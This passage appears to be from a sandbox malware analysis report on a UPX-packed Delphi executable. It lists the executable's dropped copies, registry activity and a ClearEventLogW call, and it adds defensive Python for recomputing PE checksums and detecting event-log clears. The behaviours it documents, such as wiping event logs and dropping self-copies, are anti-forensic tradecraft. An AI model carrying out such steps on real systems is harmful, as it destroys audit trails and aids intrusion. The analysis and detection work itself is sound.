                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_005DE0D8 push ecx; mov dword ptr [esp], ecx 5_2_005DE0DC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0047A268 push ecx; mov dword ptr [esp], ecx 5_2_0047A26C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00432368 push ecx; mov dword ptr [esp], edx 5_2_0043236B
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00415334 push ss; retf 5_2_004153F8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0040D570 push ecx; mov dword ptr [esp], eax 5_2_0040D575
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0040E5E0 push 0040E663h; ret 5_2_0040E65B
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0040A5A0 push ecx; mov dword ptr [esp], edx 5_2_0040A5A1
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00479670 push ecx; mov dword ptr [esp], ecx 5_2_00479675
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_004216D8 push ecx; mov dword ptr [esp], ecx 5_2_004216DB
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00421714 push ecx; mov dword ptr [esp], ecx 5_2_00421718
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00410734 push ecx; mov dword ptr [esp], edx 5_2_00410735
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File created: C:\Users\user\Downloads\wpsv.5.6.3.exe
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exe
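The static findings above report a stored checksum of 0x280db4 against a computed 0x276fb6 for both the sample and its dropped copy, UPX0/UPX1 section names on the initial sample, and a .didata section (the delay-import section name the Delphi/Embarcadero linker uses). A wrong checksum by itself is weak evidence, since the Windows loader only enforces it for drivers and a few boot-time system images, but next to UPX sections it is a post-link modification worth reproducing by hand instead of trusting a single parser. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it recomputes IMAGE_OPTIONAL_HEADER.CheckSum with the imagehlp algorithm and lists section names using the standard library only. The minimal PE32 header it builds (MZ and PE signatures, COFF and optional headers, two UPX-named section headers, no section data) is constructed for the example and is not the analysed binary; pass a file path to triage a real sample.

```python
"""Static PE triage: recompute the optional-header checksum and list section names.
Added example (not the report's or the sample's code); standard library only."""
import struct
import sys

COFF_HEADER_SIZE = 20
CHECKSUM_OFFSET_IN_OPTIONAL = 0x40   # same offset in PE32 and PE32+ optional headers
SECTION_HEADER_SIZE = 40


def _headers(data):
    """Validate MZ/PE signatures and return (e_lfanew, coff_offset, optional_header_offset)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    return e_lfanew, coff, coff + COFF_HEADER_SIZE


def stored_checksum(data):
    """CheckSum as written in the optional header (what the report calls 'real checksum')."""
    _, _, opt = _headers(data)
    return struct.unpack_from("<I", data, opt + CHECKSUM_OFFSET_IN_OPTIONAL)[0]


def pe_checksum(data):
    """Recompute the checksum the way imagehlp!CheckSumMappedFile does (the report's 'should be'):
    ones'-complement sum of every 16-bit little-endian word except the 4-byte CheckSum field,
    folded to 16 bits, plus the unpadded file length."""
    _, _, opt = _headers(data)
    skip = opt + CHECKSUM_OFFSET_IN_OPTIONAL      # assumes the PE header is 2-byte aligned
    length = len(data)
    if length % 2:
        data = bytes(data) + b"\0"                  # an odd trailing byte is zero-padded
    total = 0
    for off in range(0, len(data), 2):
        if off == skip or off == skip + 2:          # the two words of the CheckSum field
            continue
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)    # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return total + length


def section_names(data):
    """Names from the section table, which starts right after the optional header."""
    _, coff, opt = _headers(data)
    count = struct.unpack_from("<H", data, coff + 2)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]    # SizeOfOptionalHeader
    table = opt + opt_size
    names = []
    for i in range(count):
        start = table + i * SECTION_HEADER_SIZE
        names.append(data[start:start + 8].split(b"\0", 1)[0].decode("ascii", "replace"))
    return names


def triage(data):
    """The handful of static facts the report lists, computed independently."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    names = section_names(data)
    return {
        "stored_checksum": stored,
        "computed_checksum": computed,
        "checksum_ok": stored == computed,
        "sections": names,
        "upx_packed": any(n.startswith("UPX") for n in names),
        "delphi_delay_imports": ".didata" in names,
    }


def build_sample_pe(stored=0xDEADBEEF):
    """Constructed minimal PE32 header for this example (not the analysed binary): DOS header,
    PE signature at 0x40, COFF header, 224-byte optional header, UPX0/UPX1 section headers."""
    buf = bytearray(0x40 + 4 + COFF_HEADER_SIZE + 0xE0 + 2 * SECTION_HEADER_SIZE)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)          # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x44, 0x014C)        # Machine: IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", buf, 0x46, 2)             # NumberOfSections
    struct.pack_into("<H", buf, 0x54, 0xE0)          # SizeOfOptionalHeader
    struct.pack_into("<H", buf, 0x58, 0x010B)        # Magic: PE32
    struct.pack_into("<I", buf, 0x58 + 0x40, stored) # CheckSum field under test
    buf[0x138:0x13C] = b"UPX0"
    buf[0x160:0x164] = b"UPX1"
    return bytes(buf)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, val in triage(blob).items():
        print(f"{key}: {val:#x}" if isinstance(val, int) and not isinstance(val, bool) else f"{key}: {val}")
```

Because the sum covers every byte of the file except the field itself, any post-link change that did not rewrite the header (a packer pass, an appended overlay, patched configuration bytes) shows up as exactly the kind of mismatch the report lists; a stored value that still matches the original linker output tells you when in the build-and-pack chain the header was last rewritten.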

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 occurrences)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 occurrences)
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0063E56C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow, 0_2_0063E56C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_005B261C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow, 0_2_005B261C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0063E56C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow, 5_2_0063E56C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_005B261C IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow, 5_2_005B261C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog, 5_2_0307B3C0
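The OpenEventLogW/ClearEventLogW sequence above wipes a log in place, but the Event Log service records the wipe in the log it has just emptied: event 1102 (provider Microsoft-Windows-Eventlog, "The audit log was cleared") in Security and event 104 in System. Those two entries survive the clear and are the reliable hook for detection. The Python below is an added example, not part of the Joe Sandbox report: it runs that check over a constructed JSON-lines export (one object per line, the shape `Get-WinEvent ... | ConvertTo-Json -Compress` produces for each event) and ties each clear to process-creation events (4688) whose image was launched from a user-writable path within a time window. The event text and the %AppData%\Roaming path in the sample data are constructed to mirror this sample's behaviour, and the correlation assumes the events were forwarded off-host before the clear, which is the only reason the earlier 4688 is still there to match.

```python
"""Added example (not the report's code): flag ClearEventLogW on forwarded Windows event
exports and tie each clear to the process that most likely did it. Standard library only."""
import json
from datetime import datetime, timedelta

# The Event Log service writes these into the log it just emptied, so they survive the clear.
CLEAR_EVENTS = {("Security", 1102): "audit log cleared", ("System", 104): "event log cleared"}

# Launch locations a dropped RAT tends to run from (this sample copied itself to %AppData%\Roaming).
USER_WRITABLE = ("\\appdata\\", "\\users\\", "\\temp\\", "\\downloads\\", "\\programdata\\")

# Constructed JSON-lines export for the example; not taken from the report.
SAMPLE_EXPORT = r"""
{"TimeCreated":"2025-01-06T10:00:01","LogName":"Security","Id":4688,"ProviderName":"Microsoft-Windows-Security-Auditing","Message":"A new process has been created.\n\nNew Process Name:\tC:\\Users\\user\\AppData\\Roaming\\leBwnyHIgx.exe"}
{"TimeCreated":"2025-01-06T10:00:30","LogName":"Security","Id":4688,"ProviderName":"Microsoft-Windows-Security-Auditing","Message":"A new process has been created.\n\nNew Process Name:\tC:\\Windows\\System32\\svchost.exe"}
{"TimeCreated":"2025-01-06T10:02:15","LogName":"Security","Id":1102,"ProviderName":"Microsoft-Windows-Eventlog","Message":"The audit log was cleared.\nSubject:\n\tAccount Name:\tuser"}
{"TimeCreated":"2025-01-06T10:02:16","LogName":"System","Id":104,"ProviderName":"Microsoft-Windows-Eventlog","Message":"The System log file was cleared."}
{"TimeCreated":"2025-01-06T10:05:00","LogName":"System","Id":7036,"ProviderName":"Service Control Manager","Message":"The Windows Update service entered the running state."}
"""


def parse_export(text):
    """One JSON object per non-empty line -> list of event dicts, oldest first."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    return sorted(events, key=lambda ev: ev["TimeCreated"])


def new_process_name(message):
    """Pull the tab-separated 'New Process Name:' field out of a 4688 message body."""
    for line in message.splitlines():
        if line.startswith("New Process Name:"):
            return line.split("\t", 1)[1].strip()
    return None


def suspicious_launches(events):
    """(time, image path) for every 4688 whose image lives in a user-writable location."""
    hits = []
    for ev in events:
        if (ev["LogName"], ev["Id"]) != ("Security", 4688):
            continue
        path = new_process_name(ev["Message"]) or ""
        if any(token in path.lower() for token in USER_WRITABLE):
            hits.append((datetime.fromisoformat(ev["TimeCreated"]), path))
    return hits


def find_log_clears(events, window=timedelta(minutes=10)):
    """Every log-clear event, with the suspicious launches that preceded it inside `window`."""
    launches = suspicious_launches(events)
    alerts = []
    for ev in events:
        key = (ev["LogName"], ev["Id"])
        if key not in CLEAR_EVENTS:
            continue
        when = datetime.fromisoformat(ev["TimeCreated"])
        culprits = [path for started, path in launches if timedelta(0) <= when - started <= window]
        alerts.append({"time": ev["TimeCreated"], "log": ev["LogName"], "id": ev["Id"],
                       "what": CLEAR_EVENTS[key], "related_launches": culprits})
    return alerts


if __name__ == "__main__":
    for alert in find_log_clears(parse_export(SAMPLE_EXPORT)):
        print(alert)
```

On the host itself the Security log will contain only the 1102 after a clear; the 4688 that names the dropped copy in %AppData%\Roaming exists only in a collector's copy, so the correlation is worth less than the bare 1102/104 alert unless forwarding was in place before the sample ran.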
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
